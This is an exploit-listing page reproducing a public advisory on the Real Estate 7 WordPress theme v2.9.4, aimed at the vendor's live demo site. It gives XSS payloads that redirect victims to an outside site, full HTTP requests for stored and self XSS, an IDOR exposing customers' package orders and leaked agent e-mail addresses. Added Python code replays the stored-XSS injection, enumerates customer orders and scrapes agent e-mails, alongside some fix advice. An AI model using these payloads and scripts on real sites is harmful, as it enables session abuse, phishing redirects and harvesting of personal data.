Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities

CVE: CVE-2021-27948
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-01-13
CPE: cpe:/a:wordpress:real_estate_7:2.9.4
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010103

Below is a copy:

# Exploit Title: Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/realestate-7/
# Date: 12/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://contempothemes.com/
# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
# Version: 2.9.4
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 200, 319


----[]- Info: -[]----
Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/
Demo account #1: agent/agent (login/password)
PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/
PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng
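An offline check for the reflection above, added here as an editor's example (it is not code from the advisory or from the theme vendor): it rebuilds the same search URL with a random, inert canary in place of the payload and classifies a response as reflected raw, reflected HTML-encoded, or absent. The two sample responses are constructed, not captured from the demo site; that the parameter is echoed into a `value="..."` attribute, and that the builder applies to every other search parameter in the URL, are assumptions.

```python
import html
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Every field the listing search form submits, copied from the PoC URL above.
SEARCH_PARAMS = [
    "ct_keyword", "ct_city", "ct_state", "ct_zipcode", "ct_property_type",
    "ct_ct_status", "ct_beds_plus", "ct_baths_plus", "ct_community",
    "ct_country", "ct_mls", "ct_rental_guests", "ct_price_from",
    "ct_price_to", "ct_sqft_from", "ct_sqft_to", "ct_lotsize_from",
    "ct_lotsize_to", "lat", "lng",
]


def make_canary() -> str:
    """A harmless marker: the leading quote breaks out of an attribute and the
    bogus tag is inert, so the check never executes script on the target."""
    return f'"><zz{secrets.token_hex(4)}>'


def build_search_url(base: str, param: str, value: str) -> str:
    """Reproduce the search request with `value` in one parameter and every
    other field empty, the way the theme's search form submits it."""
    query = {name: "" for name in SEARCH_PARAMS}
    query["search-listings"] = "true"
    query[param] = value
    return f"{base}?{urlencode(query)}"


def query_param(url: str, param: str) -> str:
    """Read a parameter back out of a URL (used to verify the builder)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[param][0]


def classify_reflection(body: str, canary: str) -> str:
    """'raw'     : canary present byte-for-byte, attribute breakout works
       'escaped' : present only as HTML entities (esc_attr-style output)
       'none'    : not reflected at all"""
    if canary in body:
        return "raw"
    if html.escape(canary, quote=True) in body:
        return "escaped"
    return "none"


# Constructed sample responses (not captured from the demo site): the first
# echoes ct_city into the value attribute unescaped, the second entity-encodes it.
def sample_vulnerable(canary: str) -> str:
    return f'<input type="text" name="ct_city" value="{canary}" />'


def sample_patched(canary: str) -> str:
    return f'<input type="text" name="ct_city" value="{html.escape(canary, quote=True)}" />'


def probe(base: str, param: str = "ct_city") -> str:
    """Live variant: fetch the search page with a fresh canary and classify it.
    Only run against systems you are authorised to test."""
    import urllib.request
    canary = make_canary()
    with urllib.request.urlopen(build_search_url(base, param, canary), timeout=15) as resp:
        return classify_reflection(resp.read().decode("utf-8", "replace"), canary)
```

Running `probe(base, p)` over each name in `SEARCH_PARAMS` tells you which fields are echoed raw; a result of `escaped` is what the theme should produce once it wraps the echoed value in `esc_attr()`.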


----[]- Persistent XSS -> Agent Profile: -[]----
The testimonial is stored without sanitisation and rendered unescaped on the public agent profile, so every visitor who opens the profile, including a logged-in administrator, executes the payload. Vulnerable textarea: Agent Testimonials (the Show on Agents Page checkbox must be ticked). Note that WordPress sets its authentication cookies HttpOnly, so a plain document.cookie stealer will not normally yield the session; the script still runs in the victim's origin, so it can issue authenticated requests on the victim's behalf or redirect the victim to an attacker-controlled site.

Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17074317185520
Content-Length: 3843
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------17074317185520
Content-Disposition: form-data; name="first_name"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="last_name"

Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="nickname"

agent
-----------------------------17074317185520
Content-Disposition: form-data; name="display_name"

Agent Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="user_url"


-----------------------------17074317185520
Content-Disposition: form-data; name="description"


-----------------------------17074317185520
Content-Disposition: form-data; name="twitterhandle"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="facebookurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="instagramurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="linkedinurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="youtubeurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="isagent"

yes
-----------------------------17074317185520
Content-Disposition: form-data; name="agentorder"


-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_profile_img"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="mobile"

6195556589
-----------------------------17074317185520
Content-Disposition: form-data; name="fax"

6195556588
-----------------------------17074317185520
Content-Disposition: form-data; name="title"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="tagline"

Selling the Dream!
-----------------------------17074317185520
Content-Disposition: form-data; name="agentlicense"

123456
-----------------------------17074317185520
Content-Disposition: form-data; name="userTestimonial"

<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_broker_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragename"


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragelicense"


-----------------------------17074317185520
Content-Disposition: form-data; name="office"

6195553698
-----------------------------17074317185520
Content-Disposition: form-data; name="address"

101 Front St, Suite 100
-----------------------------17074317185520
Content-Disposition: form-data; name="city"

San Diego
-----------------------------17074317185520
Content-Disposition: form-data; name="state"

CA
-----------------------------17074317185520
Content-Disposition: form-data; name="postalcode"

92101
-----------------------------17074317185520
Content-Disposition: form-data; name="updateuser"

Update Profile
-----------------------------17074317185520
Content-Disposition: form-data; name="_wpnonce"

b2e5069987
-----------------------------17074317185520
Content-Disposition: form-data; name="_wp_http_referer"

/wp-real-estate-7/minimal-demo/account-settings/
-----------------------------17074317185520
Content-Disposition: form-data; name="action"

update-user
-----------------------------17074317185520--
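A replay harness for the request above, added by the editor (not code from the advisory or the theme): it pulls a fresh `_wpnonce` out of the account-settings page, because WordPress nonces are bound to the logged-in user and expire after a 24-hour window, so the value in the PoC cannot be reused, and then encodes the form fields as multipart/form-data in the order the PoC sends them. The nonce markup matched is the standard `wp_nonce_field()` hidden input; that `isagent=yes` corresponds to the Show on Agents Page checkbox is an assumption; the host, path and cookie passed to `send_update` are whatever your authorised test target uses.

```python
import http.client
import re
from typing import List, Optional, Tuple, Union

FilePart = Tuple[str, str, bytes]          # (filename, content-type, data)
Field = Tuple[str, Union[str, FilePart]]

# Payload from the advisory; any JavaScript in an event handler will do.
PAYLOAD = "<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>"

# Matches the hidden field wp_nonce_field() emits on the account-settings page.
NONCE_RE = re.compile(r'<input\b[^>]*\bname="_wpnonce"[^>]*\bvalue="([0-9a-f]{10})"', re.I)


def extract_nonce(page: str) -> Optional[str]:
    """Return the current update-user nonce, or None when logged out."""
    m = NONCE_RE.search(page)
    return m.group(1) if m else None


def update_user_fields(nonce: str, testimonial: str, referer: str) -> List[Field]:
    """Field names and order copied from the PoC; the profile values are the
    demo account's and do not matter for the bug. isagent=yes is assumed to
    be the 'Show on Agents Page' checkbox the testimonial rendering depends on."""
    empty_file: FilePart = ("", "application/octet-stream", b"")
    return [
        ("first_name", "Agent"), ("last_name", "Demo"), ("nickname", "agent"),
        ("display_name", "Agent Demo"), ("user_url", ""), ("description", ""),
        ("twitterhandle", "#"), ("facebookurl", "#"), ("instagramurl", "#"),
        ("linkedinurl", "#"), ("youtubeurl", "#"), ("isagent", "yes"),
        ("agentorder", ""), ("MAX_FILE_SIZE", "1024000"),
        ("ct_profile_img", empty_file),
        ("mobile", "6195556589"), ("fax", "6195556588"), ("title", "Agent"),
        ("tagline", "Selling the Dream!"), ("agentlicense", "123456"),
        ("userTestimonial", testimonial),
        ("MAX_FILE_SIZE", "1024000"), ("ct_broker_logo", empty_file),
        ("brokeragename", ""), ("brokeragelicense", ""), ("office", "6195553698"),
        ("address", "101 Front St, Suite 100"), ("city", "San Diego"),
        ("state", "CA"), ("postalcode", "92101"),
        ("updateuser", "Update Profile"), ("_wpnonce", nonce),
        ("_wp_http_referer", referer), ("action", "update-user"),
    ]


def multipart_body(fields: List[Field], boundary: str) -> bytes:
    """Encode the form as multipart/form-data exactly as a browser does,
    keeping duplicate names (the two MAX_FILE_SIZE fields) in order."""
    out = bytearray()
    for name, value in fields:
        out += f"--{boundary}\r\n".encode()
        if isinstance(value, tuple):
            filename, ctype, data = value
            out += (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'
                    f"Content-Type: {ctype}\r\n\r\n").encode()
            out += data + b"\r\n"
        else:
            out += f'Content-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
            out += value.encode() + b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


def send_update(host: str, path: str, cookie: str, body: bytes, boundary: str) -> int:
    """Replay the request with a live session cookie; returns the HTTP status.
    Only run against systems you are authorised to test."""
    conn = http.client.HTTPSConnection(host, timeout=20)
    conn.request("POST", path, body=body, headers={
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "Cookie": cookie,
        "Origin": f"https://{host}",
        "Referer": f"https://{host}{path}",
        "User-Agent": "Mozilla/5.0",
    })
    return conn.getresponse().status
```

On the fix side the theme needs both halves of the usual WordPress pattern: sanitise the testimonial on save (sanitize_textarea_field(), or wp_kses_post() if limited markup is wanted) and escape it on output with esc_html(); the same escaping applies to the other profile fields this handler stores.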


----[]- Persistent Self-XSS -> Listing Email Alerts: -[]----
This is self-XSS, since the saved alert is rendered back only to the account that created it, but the baths value is still stored and echoed without any escaping.

Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 294
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/
Cookie: _your_cookies_here_

ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com


----[]- IDOR: -[]----
Iterating the p parameter (1 to 4 digits) in https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX resolves posts of types other than listings. Among the results were https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/, i.e. other customers' package orders, which reveal the package name, the order date and the buyer's unique login/author name.
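The enumeration described above, written out by the editor as an added example (not the advisory's own tooling): it walks candidate post IDs, follows the redirect WordPress issues for a bare `?p=N`, and keeps every ID that lands under `/package_order/`. The resolver is injected so the logic runs offline against a constructed stub; `http_resolve` is the live variant. The slug pattern `order-<package>-<YYYY-MM-DD>-<digits>` is taken from the one URL in the advisory, and reading the trailing six digits as an HHMMSS timestamp is an assumption.

```python
import re
from typing import Callable, Dict, Iterable, List, Optional
from urllib.parse import urlsplit

# Slug shape seen in the advisory: order-<package>-<YYYY-MM-DD>-<6 digits>.
# Treating the trailing digits as an HHMMSS timestamp is an assumption.
ORDER_SLUG = re.compile(
    r"^order-(?P<package>[a-z0-9_]+)-(?P<date>\d{4}-\d{2}-\d{2})-(?P<time>\d{6})$")


def classify_target(final_url: str) -> Dict[str, str]:
    """Classify where ?post_type=listings&p=N landed after redirects. Anything
    under /package_order/ is a customer's order record, which should never
    resolve for an unauthenticated visitor."""
    segs = [s for s in urlsplit(final_url).path.split("/") if s]
    info = {"url": final_url, "kind": "other"}
    if "package_order" in segs:
        info["kind"] = "package_order"
        if segs[-1] != "package_order":
            info["slug"] = segs[-1]
            m = ORDER_SLUG.match(segs[-1])
            if m:
                info.update(m.groupdict())
    return info


def enumerate_ids(base: str, ids: Iterable[int],
                  resolve: Callable[[str], Optional[str]]) -> List[Dict[str, str]]:
    """Walk candidate post IDs and keep those that resolve to an order page.
    `resolve(url)` returns the final URL after redirects, or None for a 404;
    pass `http_resolve` for a live run or a dict's .get for an offline one."""
    hits = []
    for pid in ids:
        final = resolve(f"{base}?post_type=listings&p={pid}")
        if final is None:
            continue
        info = classify_target(final)
        if info["kind"] == "package_order":
            info["p"] = str(pid)
            hits.append(info)
    return hits


def http_resolve(url: str) -> Optional[str]:
    """Live resolver: urllib follows 30x redirects and reports the final URL.
    Only run against systems you are authorised to test."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=15) as resp:
            return resp.geturl()
    except urllib.error.HTTPError:
        return None
```

The root cause is that the order post type is publicly queryable at all; registering it with `'public' => false` (or at least `'publicly_queryable' => false`) in register_post_type() stops `?p=` from resolving it, and the single-order template should additionally check that the current user owns the order.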


----[]- Information Exposure: -[]----
Each agent profile page contains an Email link that opens a pop-up contact form. That form carries a hidden input holding the agent's unique e-mail address, for example:
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />
(the example addresses are redacted to "[email protected]" in this copy)

The same result can be obtained by viewing the source of the agent profile page (faster if you search the source for the @ symbol from the bottom up).
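A scraper for the exposure above, added as an editor's example rather than code from the advisory: it parses an agent profile page and collects the address from every hidden `ctyouremail` input, plus any `mailto:` link, without needing to read the source by hand. The profile fragment is constructed for the example, not captured from the demo site, and the surrounding markup around the hidden input is assumed.

```python
from html.parser import HTMLParser
from typing import List


class AgentEmailScraper(HTMLParser):
    """Collect every address an agent profile page gives away: the hidden
    ctyouremail input behind the 'Email' pop-up form plus any mailto: link."""

    def __init__(self) -> None:
        super().__init__()
        self.emails: List[str] = []

    def _add(self, addr: str) -> None:
        addr = addr.strip().lower()
        if "@" in addr and addr not in self.emails:
            self.emails.append(addr)

    def handle_starttag(self, tag, attrs) -> None:
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("name") == "ctyouremail":
            self._add(a.get("value", ""))
        elif tag == "a" and a.get("href", "").lower().startswith("mailto:"):
            self._add(a["href"][len("mailto:"):].split("?", 1)[0])


def agent_emails(page: str) -> List[str]:
    """Return the unique addresses exposed in `page`, in document order."""
    scraper = AgentEmailScraper()
    scraper.feed(page)
    return scraper.emails


# Constructed profile fragment (not captured from the demo site).
SAMPLE_PROFILE = """
<div class="agent-contact">
  <a href="#" class="ct-agent-email-trigger">Email</a>
  <form id="agent-contact-form" method="post">
    <input type="hidden" id="ctyouremail" name="ctyouremail" value="Agent.One@example.com" />
    <input type="text" name="name" />
  </form>
  <a href="mailto:agent.one@example.com?subject=Listing">write to me</a>
</div>
"""
```

Run `agent_emails()` over every page under `/agent/` to measure how many addresses the site leaks. The fix is not to put the address in the page at all: have the contact form submit the agent's user ID (or post ID) and let the server look up the recipient address.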
